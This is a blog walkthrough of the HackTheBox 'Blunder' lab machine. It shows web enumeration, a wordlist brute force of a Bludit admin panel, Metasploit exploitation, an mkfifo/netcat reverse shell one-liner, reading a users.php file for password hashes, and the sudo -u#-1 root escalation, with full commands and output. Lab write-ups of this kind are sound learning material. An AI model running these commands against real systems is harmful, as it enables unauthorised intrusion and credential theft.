HackTheBox - Blunder

Walkthrough of Blunder box on Hackthebox.

October 16, 2020 - 8 minute read -

HTB Blunder

HTB - Blunder

IP -


This box was an easy level linux box on HTB created by egotisticalSW, it started with discovering a todo.txt file on the webserver which had a username fergus, we use that username to bruteforce using the passlist created from the website using cewl into the admin pannel of bludit. We use these auth creds in Metasploit exploit exploit/linux/http/bludit_upload_images_exec to get a shell on the server. On enumerating the box we find a newer version of bludit on the box which has the hashed password of user hugo, after cracking it we can get the access as user Hugo. Root is based on a sudo vulnerability was the easiest part of the box.


As always let’s start off with nmap script nmap -sC for default scripts Alright, if it isn’t obvious yet I am a IPPSEC fanboi. Aight, firing up nmap to scan all open ports on the box.

nmap -sC -sV -oA nmap/results

And here is our nmap result

# Nmap 7.80 scan initiated Mon Jun  1 00:33:39 2020 as: nmap -sC -sV -o nmap_results
Nmap scan report for
Host is up (0.78s latency).
Not shown: 998 filtered ports
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun  1 00:35:13 2020 -- 1 IP address (1 host up) scanned in 94.25 seconds

Intresting, only one port open. Alright let’s run an all port scan nmap -p- -T4 and start enumerating the websever.

Enumerating the web server

HTB Blunder

About section has a note I created this site to dump my fact files, nothing more.......?, did some basic enum like checking for robots.txt, reading source code but got nothing. So let’s start a gobuster scan for directory fuzzing.

└──╼ $gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php -o gobuster_result -t 120
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        120
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
2020/10/17 17:31:28 Starting gobuster
/about (Status: 200)
/0 (Status: 200)
/admin (Status: 301)
/install.php (Status: 200)
/robots.txt (Status: 200)
/usb (Status: 200)
/todo.txt (Status: 200)

todo.txt and admin page looks interesting, checking out the todo.txt file first.

HTB Blunder

fergus looks like a username.
Let’s check the /admin pannel.

HTB Blunder

Bludit is a CMS and searching Bludit in metasploit gives us a RCE exploit but it needs the authentication creds of admin pannel.


Time to analyse what information we have gathered so far. First a username fergus, Second a metasploit exploit module for bludit that can give us RCE but needs authentication creds. Also the note in website’s about section I created this site to dump my fact files, nothing more.......?, so it can be assumed we need to brute force creds of user fergus and the password might be any word in the website as it is to dump fact files of the user. NGL.. I had a hard time figuring out that we need the wordlist created from the website to bruteforce.

Creating the wordlist.

└──╼ $cewl > wordlist.txt

Bruteforcing the /admin page using the creds will give us the creds fergus:RolandDeschain.
Now let’s use metasploit to get a shell on the box. You can also do it manually exploit but I was a beginner when I did this box first time so I used metasploit for it.

Finding the exploit

msf6 > search bludit

Matching Modules

   #  Name                                          Disclosure Date  Rank       Check  Description
   -  ----                                          ---------------  ----       -----  -----------
   0  exploit/linux/http/bludit_upload_images_exec  2019-09-07       excellent  Yes    Bludit Directory Traversal Image File Upload Vulnerability

msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp

Now you can use show exploit to list all options in the exploit, we need to set bludit’s user and password, it can be simply done by set BLUDITUSER fergus and set BLUDITPASS RolandDeschain. Similarly set the value of RHOST, LHOST and LPORT. My configuration looked like this after setting the values.

Module options (exploit/linux/http/bludit_upload_images_exec):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BLUDITPASS  RolandDeschain   yes       The password for Bludit
   BLUDITUSER  fergus           yes       The username for Bludit
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       The base path for Bludit
   VHOST                        no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST      yes       The listen address (an interface may be specified)
   LPORT  9889             yes       The listen port

After setting things up, simply type exploit or run.

msf6 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading WlFeAwiWEb.png...
[*] Uploading .htaccess...
[*] Executing WlFeAwiWEb.png...
[*] Sending stage (39189 bytes) to
[*] Meterpreter session 1 opened ( -> at 2020-10-17 18:15:18 +0530
[+] Deleted .htaccess

meterpreter > getuid
Server username: www-data (33)

Alright we got a shell on the server as user www-data.

Getting User

During basic enumeration I found a file user.php in /var/www/bludit-3.9.2/bl-content/databases which had password of users but it was a rabbit hole as those passwords were encrypted with a salt. but on enumerating more in /var/www we can found an newer version of bludit bludit-3.10.0a and the password’s in newer version’s user.php aren’t salted.

meterpreter > cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",

Throwing the hash faca404fd5c0a31cf1897b823c695c85cffeb98d in crackstation gives us user Hugo’s password - Password120. To get a shell from meterpreter use shell command and then use su Hugo and give the password Password120 and we got our user.

You can directly jump to root part..
I am covering an issue I faced during this box… IDK why but my meterpreter was messing up when I used shell command, maybe I used a wrong payload. So I executed a nc reverse shell command and got another shell nc. yes I could have changed the meterpreter payload and reused bludit exploit.

HTB Blunder

I tried nc 9001 -e /bin/bash it didn’t work, So i used this nc revershell command to get a revshell.

meterpreter > execute -f 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 9001 >/tmp/f' -H 
Process 4585 created.
meterpreter > 

Netcat listner

└──╼ $rlwrap nc -lvnp 9001
listening on [any] 9001 ...
connect to [] from (UNKNOWN) [] 49942
/bin/sh: 0: cant access tty; job control turned off
$ whoami
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@blunder:/$ su hugo
su hugo
Password: Password120

hugo@blunder:/$ cd
hugo@blunder:~$ wc -c user.txt
wc -c user.txt
33 user.txt

Rooting the box

As we have user’s Hugo password, check if we have any sudo perms.

hugo@blunder:/tmp$ sudo -l
sudo -l
Password: Password120
Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash

It reminded me of a sudo vulnerability, as I did something similar in a THM room (It could have been easily discovered using any enum script like linpeas too..), so checking the sudo version.

hugo@blunder:/tmp$ sudo -V
sudo -V
Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.25p1

Simply Googling sudo 1.8.25p1 exploit, led us to this exploit. If you read the exploit the perms match our current sudo -l perms.

hugo@blunder:/$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
Password: Password120
root@blunder:/# whoami
root@blunder:/# cd /root
cd /root
root@blunder:/root# wc -c root.txt
wc -c root.txt
33 root.txt


If you read the todo.txt file properly.

└──╼ $cat todo.txt 
- Update the CMS
- Turn off FTP - DONE
- Remove old users - DONE
- Inform fergus that the new blog needs images - PENDING

There are 3 hints in it.

  1. username - fergus
  2. new blog needs images - The bludit exploit was actually due to some vuln related to images(hint for guys who manually exploited it instead of metasploit exploit)
  3. Update the CMS - The box had two bludit version and we got the password for user in updated version.

Always read TODO notes properly.

Hope you learned something new, if you face any issues / have any query, feel free to contact me on social media.